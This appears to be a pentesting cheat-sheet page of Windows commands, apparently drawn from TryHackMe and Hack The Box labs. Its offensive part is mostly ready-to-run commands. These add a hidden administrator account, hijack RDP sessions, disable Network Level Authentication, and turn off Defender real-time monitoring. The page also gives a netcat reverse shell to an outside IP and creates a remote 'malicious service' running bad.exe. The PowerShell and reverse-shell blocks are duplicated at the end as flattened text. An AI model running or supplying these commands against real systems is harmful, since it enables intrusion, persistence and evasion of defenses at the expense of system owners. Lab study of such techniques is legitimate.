Windows useful commands

Generic useful Windows commands

Modify the Hosts File, access the Windows hosts file to modify hostname mappings:


echo 10.10.187.117 xx.local >> C:\Windows\System32\drivers\etc\hosts

Check User Privileges, display the privileges of the currently logged-in user:

whoami /priv

Check File Access Permissions, list the access control details for a specified file:

icacls

Download a File from an HTTP Server

Use wget to download a file from a specified HTTP server in Windows:

wget http://xxxxx/xxx -outfile xx

Transfer Files between Virtual Machines

Download a file from a Windows machine to another VM. Start an HTTP server on the destination and use wget to retrieve the file:

wget http://10.10.134.86:4444/exploit_me

Note: Ensure the HTTP server is running on the destination system before executing this command.

Add a Local Windows User and Assign to Administrators

Create a Windows user named "htb" with the password "abc123!" and add it to the administrators group:

net user htb abc123! /add
net localgroup administrators htb /add

Convert VHDX to VDI using VirtualBox

Use VirtualBox's VBoxManage tool to convert a VHDX file to the VDI format:

"C:\Program Files\Oracle\VBoxManage.exe" clonemedium disk "C:\Users\User\Documents\kali\kali-062024\KALI-JA\Virtual Hard Disks\Kali.vhdx" "C:\Users\User\Documents\kali\kali-062024\KALI-JA\Virtual Hard Disks\kali.vdi"

File shredding

Deleting files by simply removing them from your hard disk and recycle bin is not enough because the files are not permanently deleted and they can still be restored. There are different technics to remove them permanently from your fille system. You can overwrite the deleted data or by using a shredding tool that destroy the data.

Use the Windows built-in Cipher security tool to overwrite deleted data.

For example, the cipher /w:E command causes all deallocated space on drive E to be overwritten

cipher /w:[DRIVELETTER] 
cipher /w:E

Darik's Boot and Nuke ("DBAN") is a self-contained boot image that securely wipes hard disk drives (HDDs). DBAN is appropriate for personal use, bulk data destruction, or emergency data destruction for HDDs, but is not recommended for solid-state drives (SSDs), sanitization that requires auditable compliance documentation, or technical support.

Download link:

# RDP hijacking via CMD
# Example: Take over a disconnected session
Query system
tscon 3 /dest:rdp-tcp

Powershell useful command's


# Find .txt files in the current directory using PowerShell
Get-ChildItem *.txt

# Retrieve information on a specific package via PowerShell
Get-WmiObject -Class Win32_Product | Where-Object Name -Match TOSHIBA | Format-Table

# Get package info using Get-Package in PowerShell
Get-Package *TOSHIBA*

# Enable Remote Desktop Protocol via PowerShell
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0

# Allow Remote Desktop through Windows Firewall
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

# Add a user to the Remote Desktop Users group
Add-LocalGroupMember -Group "Remote Desktop Users" -Member "username"

# Change the administrator's password via CMD
net user USERNAME PASSWORD

# Disable Network Level Authentication to allow RDP
$TargetServer = "SCADA-SLAVE" (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName $TargetServer -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0)

# Disable NTLM to permit RDP - registry command
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f

# Enable RDP via command line alongside firewall settings
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

# Disable real-time monitoring of antivirus through PowerShell
Set-MpPreference -DisableRealtimeMonitoring $true

#get help with a powerhsll module
get help
Get-Help Get-Process
# If you want more detailed information, including examples, use:

Get-Help Get-Process -Detailed
# For the most comprehensive help, including parameter descriptions, use:

Get-Help Get-Process -Full
#And if you’re looking for examples specifically, try:

Get-Help Get-Process -Examples

Create malicious service


# Get a reverse shell from Windows using netcat
runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe 10.50.46.122 4443"

# Create and start a malicious service for a reverse shell
runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "sc.exe \\thmiis.za.tryhackme.com create LOLIservice-3249 binPath= "%windir%\bad.exe" start= auto"
runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "sc.exe \\thmiis.za.tryhackme.com start LOLIservice-3249"

PreviousPrivilege escalation NextWindows Reverse shell codes

Last updated 3 months ago

"C:\Program Files\Oracle\VBoxManage.exe" clonemedium disk "C:\Users\User\Documents\kali\kali-062024\KALI-JA\Virtual Hard Disks\Kali.vhdx" "C:\Users\User\Documents\kali\kali-062024\KALI-JA\Virtual Hard Disks\kali.vdi"

# Find .txt files in the current directory using PowerShell Get-ChildItem *.txt # Retrieve information on a specific package via PowerShell Get-WmiObject -Class Win32_Product | Where-Object Name -Match TOSHIBA | Format-Table # Get package info using Get-Package in PowerShell Get-Package *TOSHIBA* # Enable Remote Desktop Protocol via PowerShell Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0 # Allow Remote Desktop through Windows Firewall Enable-NetFirewallRule -DisplayGroup "Remote Desktop" # Add a user to the Remote Desktop Users group Add-LocalGroupMember -Group "Remote Desktop Users" -Member "username" # Change the administrator's password via CMD net user USERNAME PASSWORD # Disable Network Level Authentication to allow RDP $TargetServer = "SCADA-SLAVE" (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName $TargetServer -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0) # Disable NTLM to permit RDP - registry command reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP" /v UserAuthentication /t REG_DWORD /d "0" /f # Enable RDP via command line alongside firewall settings reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f netsh advfirewall firewall set rule group="remote desktop" new enable=Yes # Disable real-time monitoring of antivirus through PowerShell Set-MpPreference -DisableRealtimeMonitoring $true #get help with a powerhsll module get help Get-Help Get-Process # If you want more detailed information, including examples, use: Get-Help Get-Process -Detailed # For the most comprehensive help, including parameter descriptions, use: Get-Help Get-Process -Full #And if you’re looking for examples specifically, try: Get-Help Get-Process -Examples

# Get a reverse shell from Windows using netcat runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe 10.50.46.122 4443" # Create and start a malicious service for a reverse shell runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "sc.exe \\thmiis.za.tryhackme.com create LOLIservice-3249 binPath= "%windir%\bad.exe" start= auto" runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "sc.exe \\thmiis.za.tryhackme.com start LOLIservice-3249"